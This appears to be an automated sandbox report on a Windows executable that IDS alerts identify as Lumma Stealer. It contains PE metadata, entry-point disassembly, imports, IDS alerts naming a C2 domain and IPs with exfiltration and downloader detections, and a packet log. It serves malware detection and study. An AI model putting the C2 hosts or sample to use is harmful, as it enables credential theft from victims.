                                                                                                                SHA512:9268392683a9962143f987f069d97016abd1ccd61bb67aa8e3f8d9c4b7aa6168d3c01884ce9023831216b8710eddee2d52fcb3c84dbacefe94cb28fa661b6a79
                                                                                                                SSDEEP:6144:vdoOpYMkIn20q2g3XEaO2mtVAo7xTYGqIz4dlKub1hdj294cHczD/+OEjB8iHotV:vdoOphZgHWvAmz4dZb1rj2OWDbjHon
                                                                                                                TLSH:A684F12171C0C872E2B3153219B1DFAA5A7EFA200F90AEDF678C15B64F755C089349BB
                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...bI\g..........".................\L............@.......................................@.................................D~..(..
                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                Entrypoint:0x404c5c
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows cui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x675C4962 [Fri Dec 13 14:49:06 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:2716f32d1d63b3fc977d6064633b778d
                                                                                                                Instruction
                                                                                                                call 00007F4EB0B6F36Ah
                                                                                                                jmp 00007F4EB0B6EF89h
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                push dword ptr [ebp+08h]
                                                                                                                call 00007F4EB0B6F11Fh
                                                                                                                neg eax
                                                                                                                pop ecx
                                                                                                                sbb eax, eax
                                                                                                                neg eax
                                                                                                                dec eax
                                                                                                                pop ebp
                                                                                                                ret
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                cmp dword ptr [0041B4F0h], FFFFFFFFh
                                                                                                                push dword ptr [ebp+08h]
                                                                                                                jne 00007F4EB0B6F119h
                                                                                                                call 00007F4EB0B71731h
                                                                                                                jmp 00007F4EB0B6F11Dh
                                                                                                                push 0041B4F0h
                                                                                                                call 00007F4EB0B716B4h
                                                                                                                pop ecx
                                                                                                                pop ecx
                                                                                                                xor ecx, ecx
                                                                                                                test eax, eax
                                                                                                                cmove ecx, dword ptr [ebp+08h]
                                                                                                                mov eax, ecx
                                                                                                                pop ebp
                                                                                                                ret
                                                                                                                push 00000008h
                                                                                                                push 00418D38h
                                                                                                                call 00007F4EB0B6F650h
                                                                                                                and dword ptr [ebp-04h], 00000000h
                                                                                                                mov eax, 00005A4Dh
                                                                                                                cmp word ptr [00400000h], ax
                                                                                                                jne 00007F4EB0B6F16Fh
                                                                                                                mov eax, dword ptr [0040003Ch]
                                                                                                                cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                jne 00007F4EB0B6F15Eh
                                                                                                                mov ecx, 0000010Bh
                                                                                                                cmp word ptr [eax+00400018h], cx
                                                                                                                jne 00007F4EB0B6F150h
                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                mov ecx, 00400000h
                                                                                                                sub eax, ecx
                                                                                                                push eax
                                                                                                                push ecx
                                                                                                                call 00007F4EB0B6F292h
                                                                                                                pop ecx
                                                                                                                pop ecx
                                                                                                                test eax, eax
                                                                                                                je 00007F4EB0B6F139h
                                                                                                                cmp dword ptr [eax+24h], 00000000h
                                                                                                                jl 00007F4EB0B6F133h
                                                                                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                mov al, 01h
                                                                                                                jmp 00007F4EB0B6F131h
                                                                                                                mov eax, dword ptr [ebp-14h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                xor ecx, ecx
                                                                                                                cmp dword ptr [eax], C0000005h
                                                                                                                sete cl
                                                                                                                mov eax, ecx
                                                                                                                ret
                                                                                                                mov esp, dword ptr [ebp-18h]
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x17e440x28.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d0000xe8.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e0000x12fc.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x128080xc0.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x17fac0x140.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x10c150x10e0005d7420100633613bdbd5a889171c5f7False0.5704427083333333data6.50620173764596IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x120000x72940x74004965eb04eb8b1b66b8d84a097bc01bc3False0.3977976831896552data4.65662016842751IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x1a0000x1c100x12006a2a147d595c2e66ddd7fdd872225955False0.4281684027777778data4.604642940636322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .OO0x1c0000x40x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x1d0000xe80x2000713d2c4e51a805f2ce8d9843bcbad43False0.306640625data2.337865625306241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x1e0000x12fc0x1400c56221e7af6185e7585b1796050bcf12False0.778515625data6.424268394395036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                .bss0x200000x47e000x47e00e181aee4ec0f2cb24b0263d3bda0c975False1.0003260869565218data7.999269659506522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_MANIFEST0x1d0600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                                                DLLImport
                                                                                                                KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-18T14:17:38.040410+01002058230ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz)1192.168.2.9621581.1.1.153UDP
                                                                                                                2024-12-18T14:17:39.594103+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.949722104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:39.594103+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949722104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:40.391480+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949722104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:40.391480+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949722104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:41.765494+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.949728104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:41.765494+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949728104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:43.299167+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949728104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:43.299167+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949728104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:44.904371+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.949734104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:44.904371+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949734104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:49.032054+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.949745104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:49.032054+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949745104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:54.303194+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.949756104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:54.303194+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949756104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:59.203645+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.949769104.21.50.161443TCP
                                                                                                                2024-12-18T14:17:59.203645+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949769104.21.50.161443TCP
                                                                                                                2024-12-18T14:18:01.489309+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949769104.21.50.161443TCP
                                                                                                                2024-12-18T14:18:03.131445+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.949780104.21.50.161443TCP
                                                                                                                2024-12-18T14:18:03.131445+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949780104.21.50.161443TCP
                                                                                                                2024-12-18T14:18:11.769477+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.949801104.21.50.161443TCP
                                                                                                                2024-12-18T14:18:11.769477+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949801104.21.50.161443TCP
                                                                                                                2024-12-18T14:18:13.537532+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949801104.21.50.161443TCP
                                                                                                                2024-12-18T14:18:15.030238+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.949807185.215.113.1680TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 18, 2024 14:17:38.363010883 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:38.363063097 CET44349722104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:38.363169909 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:38.366199017 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:38.366214991 CET44349722104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:39.594019890 CET44349722104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:39.594103098 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:39.598068953 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:39.598078966 CET44349722104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:39.598520041 CET44349722104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:39.638719082 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:39.659888029 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:39.659921885 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:39.660105944 CET44349722104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:40.391519070 CET44349722104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:40.391760111 CET44349722104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:40.391866922 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:40.393907070 CET49722443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:40.393928051 CET44349722104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:40.456551075 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:40.456595898 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:40.456690073 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:40.457065105 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:40.457084894 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:41.765383959 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:41.765494108 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:41.767327070 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:41.767337084 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:41.767685890 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:41.769053936 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:41.769079924 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:41.769117117 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.299184084 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.299246073 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.299273014 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.299292088 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.299318075 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.299355984 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.299357891 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.299365997 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.299393892 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.303776979 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.312145948 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.312333107 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.312344074 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.357500076 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.357517004 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.404417992 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.418879986 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.466934919 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.466955900 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.491235018 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.491292953 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.491321087 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.494935036 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.494980097 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.494987965 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.495028019 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.495073080 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.495131969 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.495152950 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.495155096 CET49728443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.495160103 CET44349728104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.640080929 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.640137911 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:43.640225887 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.640571117 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:43.640584946 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:44.904262066 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:44.904371023 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:44.906492949 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:44.906507969 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:44.906775951 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:44.908054113 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:44.908236980 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:44.908267975 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.371505976 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.371781111 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.371850967 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.371877909 CET49734443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.371891022 CET44349734104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.500345945 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.500395060 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:47.500484943 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.500813007 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:47.500828981 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.031884909 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.032053947 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.033648014 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.033655882 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.033948898 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.035337925 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.035495043 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.035525084 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:49.035680056 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:49.083338976 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:52.387547016 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:52.387748003 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:52.387829065 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:52.387952089 CET49745443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:52.387975931 CET44349745104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:53.035037994 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:53.035085917 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:53.035159111 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:53.035701990 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:53.035717010 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.303069115 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.303194046 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.304678917 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.304686069 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.305021048 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.309602022 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.309768915 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.309809923 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:54.309890985 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:54.309899092 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.466108084 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.466193914 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.466255903 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.466443062 CET49756443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.466464043 CET44349756104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.986156940 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.986207008 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:57.986304998 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.987334013 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:57.987344980 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:59.203564882 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:59.203644991 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:59.205456018 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:59.205465078 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:59.205698013 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:17:59.207034111 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:59.207139015 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:17:59.207143068 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.489305973 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.489413977 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.489485025 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.489656925 CET49769443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.489679098 CET44349769104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.916040897 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.916094065 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:01.916193962 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.916564941 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:01.916583061 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.131371021 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.131444931 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.138328075 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.138345003 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.138689995 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.144411087 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.145531893 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.145567894 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.145662069 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.145706892 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.145822048 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.145853043 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.145982027 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.146008015 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.146142960 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.146162987 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.146311998 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.146347046 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.146356106 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.146490097 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.146522999 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.191339970 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.191529036 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.191587925 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.191605091 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.235347033 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.235555887 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.235605001 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.235641003 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.279328108 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.279450893 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.326302052 CET49780443192.168.2.9104.21.50.161
                                                                                                                Dec 18, 2024 14:18:03.326332092 CET44349780104.21.50.161192.168.2.9
                                                                                                                Dec 18, 2024 14:18:03.507030964 CET44349780104.21.50.161192.168.2.9
